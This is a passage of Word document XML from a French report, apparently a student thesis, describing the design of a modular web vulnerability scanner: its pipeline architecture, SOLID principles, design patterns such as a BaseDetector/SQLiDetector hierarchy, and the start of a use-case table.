          <w:p w14:paraId="77900B74" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Rapport HTML autonome — lisible sans installation logicielle</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C145A4C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Architecture modulaire — ajout facile de nouveaux détecteurs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D90ADF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Interface CLI simple : python main.py --url &lt;cible&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1882F132" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Support de l'authentification (DVWA, login générique)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="726BB904" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • 42 tests unitaires — qualité et fiabilité garanties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59E749EA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="006A6D93">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190B7578" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A63FCD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="1" w:color="B40000"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapitre 2 – Conception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEA990D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Ce chapitre présente la conception détaillée de notre scanner de vulnérabilités web. Partant des besoins identifiés dans le chapitre précédent, nous formalisons ici l'architecture du système, les diagrammes UML qui en décrivent la structure et le comportement, la description technique de chaque module, et les choix technologiques retenus. La conception suit les principes du Clean Architecture : séparation des préoccupations, injection de dépendances, et testabilité maximale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FE720C"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2.1  Architecture Générale du Système</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A069B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Notre scanner adopte une architecture en pipeline à cinq étapes, où chaque étape consomme la sortie de l'étape précédente. Cette approche garantit une séparation stricte des responsabilités : le module de crawling ne connaît pas la logique de détection, les détecteurs ignorent comment le rapport est généré, etc. Chaque module peut être testé, remplacé ou étendu indépendamment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C56C1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Architecture en pipeline du scanner de vulnérabilités</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0007D1" w14:textId="77777777" w:rsidR="000C0001" w:rsidRDefault="000C0001">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5900000" cy="10159100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2001" name="diag_pipeline" descr="Architectur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iag_pipeline"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5900000" cy="10159100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC84AA5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.1.1  Principes de Conception Retenus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E45E1B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsabilité Unique (SRP) : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Chaque module (crawler, détecteur, evaluator, reporter) a une responsabilité unique et clairement définie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFAF431" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ouvert/Fermé (OCP) : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'ajout d'un nouveau détecteur n'impose aucune modification du code existant — il suffit de créer une nouvelle classe héritant de BaseDetector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C76F974" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Substitution de Liskov (LSP) : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tous les détecteurs exposent la même interface scan(endpoint) -&gt; list[Vulnerability].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4CC881" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection de dépendances : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les modules sont instanciés avec une session requests partagée, permettant la réutilisation des cookies d'authentification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB4F652" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.1.2  Patterns de Conception Utilisés</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A928F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Patterns de conception utilisés dans le scanner</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1981"/>
        <w:gridCol w:w="2267"/>
        <w:gridCol w:w="5090"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="42FE0B88" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45B571EF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CE0AC93" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5102" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32495992" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="0E5200FE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270D43EA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Template Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42F323E0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BaseDetector → SQLiDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5102" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B4273D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Définit le squelette scan_all() — les sous-classes implémentent scan()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="2C686887" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7AFCBBBB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4CBADC42" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ALL_DETECTORS dict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5102" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="37A0BC66" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Sélection dynamique des détecteurs à l'exécution selon --only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="79ED7849" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C7EC3DB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="662C86F7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>detectors/__init__.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5102" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5542ACD6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Instanciation des détecteurs par nom (string → classe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="1954D786" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="262C93F7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="17351F8F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Scanner.core.run()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5102" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6C086698" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Orchestration séquentielle des étapes de traitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66DCDE5C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="006A6D93">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424B4F7B"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2.2  Diagramme de Cas d'Utilisation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E34F647" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Le diagramme de cas d'utilisation modélise les interactions entre l'acteur principal (l'analyste en sécurité) et le système scanner. Il identifie cinq cas d'utilisation principaux, certains incluant des comportements optionnels (extend) ou réutilisant des fonctionnalités communes (include).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0007D2" w14:textId="77777777" w:rsidR="000C0001" w:rsidRDefault="000C0001">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5900000" cy="2459342"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2002" name="diag_usecase"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iag_usecase"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5900000" cy="2459342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="424AE706" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Description détaillée des cas d'utilisation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="680"/>
        <w:gridCol w:w="2546"/>
        <w:gridCol w:w="1415"/>
        <w:gridCol w:w="1981"/>
        <w:gridCol w:w="2716"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="1E7CCBD4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E8DAD44" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C3CEC9C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
